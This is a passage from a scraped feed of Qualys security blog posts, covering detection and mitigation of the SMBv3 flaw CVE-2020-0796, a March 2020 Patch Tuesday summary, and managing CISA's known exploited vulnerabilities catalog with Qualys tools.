VULNSIGS-2.4.841-3.\n\nQID 91616: Microsoft Windows SMBv3 Compression Remote Code Execution Vulnerability (KB4551762)\n\nDetails on Qualys QIDs 91614 and 91616:\n\nIf you have not applied SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch or SMBv3 workaround:\n\nQIDs 91614 and 91616 will be posted in the scan results.\n\nIf you have applied SMBv3 workaround, but SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch is not applied on the host:\n\nQID 91616 will be posted in the scan results.\n\nIf SMBv3 [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) patch is applied on the host:\n\nNo QID will be posted in the scan result.\n\n \n\nAlong with the two confirmed vulnerability QIDs, Qualys also released the following IG QID, to help customers track assets on which they have the mitigation applied. This QID can be detected via remote unauthenticated and authenticated scans or via Qualys Cloud Agent.\n\n_QID 48086: Microsoft Server Message Block (SMBv3) Compression Disabled_\n\nYou can search within the [VM Dashboard](<http://href="https://discussions.qualys.com/docs/DOC-6446-dashboard-toolbox-new-vulnerability-management-vm-dashboard-beta>) by using the following QQL query:\n\n_vulnerabilities.vulnerability.cveIds:CVE-2020-0796_ \n_vulnerabilities.vulnerability.qid:91614_\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/MS-dashboard-600x174.png)\n\n \n\n### Detection Dashboard\n\nYou can also track all hosts impacted by CVE-2020-0796 vulnerability in your environment with the [Microsoft RCE SMBv3 Vulnerability Dashboard](<https://discussions.qualys.com/docs/DOC-7092-dashboard-toolbox-vm-dashboard-microsoft-rce-smbv3-advisory-cve-2020-0796>) that leverages data in your Qualys Vulnerability Management subscription, as shown below:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/ScreenShot2020-03-15at2.23.06PM.png)\n\n \n\n### Qualys Threat Protection\n\nQualys customers can locate vulnerable hosts through [Qualys Threat Protection.](<https://www.qualys.com/apps/threat-protection/>) This helps accelerate identification and tracking of this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/TP-MS-blog-600x548.png)\n\nSimply click on the impacted assets number to see a list of hosts with this vulnerability.\n\n### Workaround\n\n * **Disable SMBv3 compression**\n\nYou can disable compression to block unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below -\n\n_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force_\n\n * **Block TCP port 445 at the enterprise perimeter firewall**\n\nTCP port 445 is used to initiate a connection with the affected component. Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability.\n\n### Remediation\n\nCustomers should install patch updates [KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>) for affected operating systems to be protected from this vulnerability.", "cvss3": {}, "published": "2020-03-11T23:38:37", "type": "qualysblog", "title": "Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-11T23:38:37", "id": "QUALYSBLOG:22A5C3C4F56D3B499B24DF2E1626F4C1", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/11/microsoft-windows-smbv3-remote-code-execution-vulnerability-cve-2020-0796", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T19:36:24", "description": "This month\u2019s [Patch Tuesday](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches>), Microsoft disclosed a critical \u201cwormable\u201d remote code execution (RCE) vulnerability in Microsoft Server Message Block 3.1.1 (SMBv3) protocol. The exploitation of this vulnerability opens systems up to a 'wormable' attack, which means it would be easy to move from victim to victim.\n\nQualys released a blog post earlier on how to identify SMBv3 vulnerability in your environment: \n[Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/11/microsoft-windows-smbv3-remote-code-execution-vulnerability-cve-2020-0796>)\n\nHere we describe how to resolve it with Qualys VMDR\u00ae.\n\n### Identify Assets, Discover, Prioritize and Remediate using Qualys VMDR\u00ae\n\nQualys VMDR, all-in-one vulnerability management, detection and response enables: \n\n * Identification of known and unknown hosts running vulnerable SMBv3 servers and clients\n * Automatic detection of vulnerabilities and misconfigurations for SMBv3 servers and clients\n * Prioritization of threats based on risk\n * Integrated patch deployment \n\n#### Identification of Assets with SMBv3 Server or Client\n\nThe first step in managing vulnerabilities and reducing risk is identification of assets. VMDR enables easy identification of hosts with SMBv3 Server/Client with open port \"445\" \u2013\n\n_operatingSystem.category:`Windows/Server` and openPorts.port:445_\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/Screen-Shot-2020-03-12-at-11.24.28-AM-600x304.png) \n_operatingSystem.category:`Windows/Client` and openPorts.port:445_\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/Screen-Shot-2020-03-12-at-11.26.32-AM-600x306.png)\n\nUsing VMDR, you can also identify SMBv3 is enabled on the host via Qualys IG QID 45262 as shown below:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/Screen-Shot-2020-03-16-at-3.49.19-PM-600x226.png)\n\nOnce the hosts are identified, they can be grouped together with a \u2018dynamic tag\u2019, eg \u2013 SMBv3. This helps in automatically grouping existing hosts with SMBv3 Server/Client as well as any new host spins up with SMBv3 server. Tagging makes these grouped assets available for querying, reporting and management throughout the [Qualys Cloud Platform](<https://www.qualys.com/cloud-platform/>).\n\n#### Discover SMBv3 RCE Vulnerabilities and Misconfigurations\n\nNow that the hosts with SMBv3 Client/Server are identified, you want to detect which of these assets have flagged the CVE-2020-0796 vulnerability. VMDR automatically detects new vulnerabilities like CVE-2020-0796 based on the always updated Knowledgebase.\n\nYou can see all your impacted hosts for CVE-2020-0796 (or by Qualys ID: 91614 or 91616) for your \u2018SMBv3\u2019 asset tag in vulnerabilities view by using QQL query:\n\n_vulnerabilities.vulnerability.cveIds:`CVE-2020-0796`_\n\nThis will return a list of all impacted hosts.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/Screen-Shot-2020-03-16-at-3.52.46-PM-600x324.png)\n\nQID 91616 helps identify assets with patch ([KB4551762](<https://support.microsoft.com/en-us/help/4551762/windows-10-update-kb4551762>)) applied and QID 91614 helps identify assets with SMBv3 workaround applied for CVE-2020-0796 across all impacted operating systems using authenticated scanning or the [Qualys Cloud Agent](<https://www.qualys.com/cloud-agent/>). \nAlong with the two confirmed vulnerability QIDs, Qualys released the following IG QID 48086, to help customers track assets on which they have the mitigation applied. This QID can be detected via remote unauthenticated and authenticated scans or via Qualys Cloud Agent.\n\n_QID 48086: Microsoft Server Message Block (SMBv3) Compression Disabled. _\n\nVMDR also enables you to stay on top of these threats proactively via the \u2018live feed\u2019 provided for threat prioritization. With \u2018live feed\u2019 updated for all emerging high and medium risks, you can clearly see the impacted hosts against threats. \n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/TP-MS-blog-1-600x548.png)\n\nSimply click on the impacted assets for the SMBv3 threat feed to see the vulnerability and impacted host details.\n\nWith VM Dashboard, you can track SMBv3 vulnerabilities, impacted hosts, their status and overall management in real time. With trending enabled for dashboard widgets, you can keep track of SMBv3 RCE vulnerability trends in your environment using [Microsoft RCE SMBv3 Vulnerability Dashboard](<https://discussions.qualys.com/docs/DOC-7092-dashboard-toolbox-vm-dashboard-microsoft-rce-smbv3-advisory-cve-2020-0796>) -\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/ScreenShot2020-03-15at2.23.06PM.png)\n\n**Configuration management adds context to overall vulnerability management**** ** \n\n\nTo overall reduce the security risk, it is important to take care of SMB server misconfigurations as well. Qualys VMDR shows your SMBv3 misconfiguration posture in context with your vulnerability posture, allowing you to see which hosts have SMBv3 RCE vulnerability. It also shows SMBv3 misconfigurations, elevating the risk for these hosts compared to the hosts for which there may be a vulnerability but where the default port 445 is not used or the configuration is already hardened. \n \nWith [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) module of VMDR, you can automatically discover open ports or firewall restricted port 445 and if they have misconfigurations in context to CVE-2020-0796 vulnerability.\n\n * Qualys configuration ID \u2013 11220 \u201cList of 'Inbound Rules' configured in Windows Firewall with Advanced Security\u201d would be evaluated against to identify if port 445 is blocked in windows firewall inbound rules as shown below -\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/11220-Psss-600x216.png)\n\n * Qualys configuration ID \u2013 14297 \u201cStatus of the open network connections and listening ports\u201d would be evaluated to identify if port 445 is open and listening as shown below -\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/14297-failed-600x261.png)\n\n * Qualys UDC configuration ID \u2013 101849 \u201cStatus of 'CompressionEnabled'\u201d (UDC type: \u201cRegistry Value Content Check\u201d) would be evaluated to verify if the value of \"DisableCompression\" is set to \"1\" as shown below:\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/UDC_101849-Pass-600x163.png)\n\n#### \n\n#### Risk-Based Prioritization of SMBv3 RCE Vulnerability\n\nNow that you have identified the hosts, versions and context of detected vulnerabilities and misconfigurations, you may want to prioritize your remediation based on the risk, as each vulnerable asset might not pose the same risk. \n\n\n**High Risk****:**** **\n\n * Hosts with SMBv3 enabled and patch or workaround not applied are at high risk. \n * If due to the business reasons it is not possible to apply the patch on the hosts for which CVE-2020-0796 is detected. Customers can check for misconfigurations (CIDs 14297 and 101849 controls are failing) as shown below-\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/UDC_101849-Errornot-found-600x169.png)\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/14297-failed-600x261.png)\n\n**Medium Risk:**\n\n * Hosts with SMBv3 enabled for which CVE-2020-0796 is detected, however, the configuration 101849 is detected as hardened are at medium risk.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/UDC_101849-Pass-1-600x163.png)\n\n \n\n### Response by Patching and Remediation\n\nVMDR rapidly remediates the Windows hosts by deploying the most relevant and applicable per-technology version patches. You can simply select \"cve:`CVE-2020-0796`\" in the Patch Catalog and filter on the \u201cMissing\u201d patches to identify and deploy the applicable, available patches in one go for hosts grouped together by a tag \u2013 SMBv3.\n\nFor proactive, continuous patching, you can create a daily job with a 24-hour \u201cPatch Window\u201d to ensure all hosts will continue to receive the required patches as new patches become available for the emerging vulnerabilities.\n\nUsers are encouraged to apply patches as soon as possible.\n\n![](https://blog.qualys.com/wp-content/uploads/2020/03/Screen-Shot-2020-03-16-at-4.26.23-PM-600x242.png)\n\nIn cases where due to business reasons, it is not possible to apply patches, it is recommended that you reduce your security risk by remediating the related configuration settings for all running SMBv3 servers as provided in [Qualys Policy Compliance](<https://community.qualys.com/policy-compliance/>) by applying following workarounds:\n\n * **Disable SMBv3 compression**\n\nYou can disable compression to block unauthenticated attackers from exploiting the vulnerability against an SMBv3 Server with the PowerShell command below -\n\n_Set-ItemProperty -Path \"HKLM:\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters\" DisableCompression -Type DWORD -Value 1 -Force_\n\n * **Block TCP port 445 at the enterprise perimeter firewall**\n\nTCP port 445 is used to initiate a connection with the affected component. Blocking this port at the network perimeter firewall will help protect systems that are behind that firewall from attempts to exploit this vulnerability.\n\n### \n\n \n\n### Get Started Now\n\nStart your [Qualys VMDR trial](<https://www.qualys.com/subscriptions/vmdr/>) for automatically identifying, detecting and patching critical SMBv3 RCE vulnerability CVE-2020-0796.", "cvss3": {}, "published": "2020-03-16T23:34:12", "type": "qualysblog", "title": "Automatically Discover, Prioritize and Remediate Microsoft SMBv3 RCE Vulnerability (CVE-2020-0796) using Qualys VMDR", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0796"], "modified": "2020-03-16T23:34:12", "id": "QUALYSBLOG:016288CBC518BC4CE318130A921071C2", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/16/automatically-discover-prioritize-and-remediate-microsoft-smbv3-rce-vulnerability-cve-2020-0796-using-qualys-vmdr", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-17T19:36:24", "description": "This month\u2019s Microsoft Patch Tuesday addresses 115 vulnerabilities with 26 of them labeled as Critical. Of the 26 Critical vulns, 17 are for browser and scripting engines, 4 are for Media Foundation, 2 are for GDI+ and the remaining 3 are for LNK files, Microsoft Word and Dynamics Business. Microsoft also issued a patch for an RCE in Microsoft Word. Adobe has not posted any patches for Patch Tuesday.\n\nOn the basis of volume and severity this Patch Tuesday is heavy in weight.\n\nSee [details of the new detections](<https://www.qualys.com/research/security-alerts/2020-03-10/microsoft/>), including description, consequence and solution.\n\n### Workstation Patches\n\nThe Scripting Engine, LNK files ([CVE-2020-0684](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0684>)), GDI+([CVE-2020-0831, ](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0831>)[CVE-2020-0883](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0883>)) and Media Foundation (CVE-2020-0801, CVE-2020-0809, CVE-2020-0807, CVE-2020-0869) patches should be prioritized for workstation-type devices, meaning any system that is used for email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Word RCE\n\nA Remote Code Execution vulnerability ([CVE-2020-0852](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0852>)) in Microsoft Word is also covered in today\u2019s patch release. An attacker could exploit the vulnerability using a specially crafted file to perform actions on behalf of the logged-in user with the same permissions as the current user.\n\n### Application Inspector RCE\n\nMicrosoft has also fixed a Remote Code Execution vulnerability ([CVE-2020-0872](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2020-0872>)) in Application Inspector. This vulnerability can allow an attacker to execute their code on a target system if they can convince a user to run Application Inspector on code that includes a specially crafted third-party component. This patch should be prioritized, despite being labeled as \u201cImportant\u201d by Microsoft.\n\n### Dynamics Business Central RCE\n\nDynamics Business Central client is affected by a Remote Code Execution vulnerability ( [CVE-2020-0905](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-0905>)) that could allow attackers to execute arbitrary shell commands on a target system. While this vulnerability is labeled as \u201cExploitation Less Likely,\u201d considering the target is likely a critical server, this should be prioritized across all Windows servers and workstations.\n\nThere are no Adobe patches released for this Month's Patch Tuesday.\n\n**Update March 11, 2020**: See [Microsoft Windows SMBv3 Remote Code Execution Vulnerability (CVE-2020-0796)](<https://blog.qualys.com/laws-of-vulnerabilities/2020/03/11/microsoft-windows-smbv3-remote-code-execution-vulnerability-cve-2020-0796>)", "cvss3": {}, "published": "2020-03-10T19:07:42", "type": "qualysblog", "title": "March 2020 Patch Tuesday \u2013 115 Vulns, 26 Critical, Microsoft Word and Workstation Patches", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-0684", "CVE-2020-0796", "CVE-2020-0801", "CVE-2020-0807", "CVE-2020-0809", "CVE-2020-0831", "CVE-2020-0852", "CVE-2020-0869", "CVE-2020-0872", "CVE-2020-0883", "CVE-2020-0905"], "modified": "2020-03-10T19:07:42", "id": "QUALYSBLOG:9B7C3806B8C67809B298463FBE31A0A4", "href": "https://blog.qualys.com/laws-of-vulnerabilities/2020/03/10/march-2020-patch-tuesday-115-vulns-26-critical-microsoft-word-and-workstation-patches", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nLast November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team is continuously updating CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, with the RTI field \u201cCISA Exploited\u201d and this is going to be a continuous approach, as CISA frequently amends with the latest CVE as part of their regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified Vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022) we recommend executing your search based on QQL (Qualys Query Language), as shown here for released QIDs by Qualys **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-Actual-1.jpg)\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-2.jpg)\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-3.jpg)\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities and track your status and overall management in real-time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-4-scaled.jpg)\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities as per the remediation timelines suggested in [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>)**.**\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, some of the vulnerabilities introduced by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help customers comply with the directive\u2019s aggressive remediation timelines set by CISA. Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/patch-mgmt-windows2.jpg)\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n![](https://blog.qualys.com/wp-content/uploads/2022/02/CISA-6.jpg)\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help your organization to achieve compliance with this binding directive. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>) to our credit.\n\nHere are a few steps Federal entities can take immediately:\n\n * Run vulnerability assessments against all of your assets by leveraging our various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Qualys Patch Management to apply patches and other configuration changes\n * Track remediation progress through our Unified Dashboards\n\n### Summary\n\nUnderstanding just which vulnerabilities exist in your environment is a critical but small part of threat mitigation. Qualys VMDR helps customers discover their exposure, assess threats, assign risk, and remediate threats \u2013 all in a single unified solution. Qualys customers rely on the accuracy of Qualys\u2019 threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any size organization efficiently respond to CISA Binding Operational Directive 22-01.\n\n#### Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2022-02-23T05:39:00", "type": "qualysblog", "title": "Managing CISA Known Exploited Vulnerabilities with Qualys VMDR", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": true, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2010-5326", "CVE-2012-0158", "CVE-2012-0391", "CVE-2012-3152", "CVE-2013-3900", "CVE-2013-3906", "CVE-2014-1761", "CVE-2014-1776", "CVE-2014-1812", "CVE-2015-1635", "CVE-2015-1641", "CVE-2015-4852", "CVE-2016-0167", "CVE-2016-0185", "CVE-2016-3088", "CVE-2016-3235", "CVE-2016-3643", "CVE-2016-3976", "CVE-2016-7255", "CVE-2016-9563", "CVE-2017-0143", "CVE-2017-0144", "CVE-2017-0145", "CVE-2017-0199", "CVE-2017-0262", "CVE-2017-0263", "CVE-2017-10271", "CVE-2017-11774", "CVE-2017-11882", "CVE-2017-12149", "CVE-2017-5638", "CVE-2017-5689", "CVE-2017-6327", "CVE-2017-7269", "CVE-2017-8464", "CVE-2017-8759", "CVE-2017-9791", "CVE-2017-9805", "CVE-2017-9841", "CVE-2018-0798", "CVE-2018-0802", "CVE-2018-1000861", "CVE-2018-11776", "CVE-2018-15961", "CVE-2018-15982", "CVE-2018-2380", "CVE-2018-4878", "CVE-2018-4939", "CVE-2018-6789", "CVE-2018-7600", "CVE-2018-8174", "CVE-2018-8453", "CVE-2018-8653", "CVE-2019-0193", "CVE-2019-0211", "CVE-2019-0541", "CVE-2019-0604", "CVE-2019-0708", "CVE-2019-0752", "CVE-2019-0797", "CVE-2019-0803", "CVE-2019-0808", "CVE-2019-0859", "CVE-2019-0863", "CVE-2019-10149", "CVE-2019-10758", "CVE-2019-11510", "CVE-2019-11539", "CVE-2019-1214", "CVE-2019-1215", "CVE-2019-13272", "CVE-2019-1367", "CVE-2019-1429", "CVE-2019-1458", "CVE-2019-16759", "CVE-2019-17026", "CVE-2019-17558", "CVE-2019-18187", "CVE-2019-18988", "CVE-2019-2725", "CVE-2019-8394", 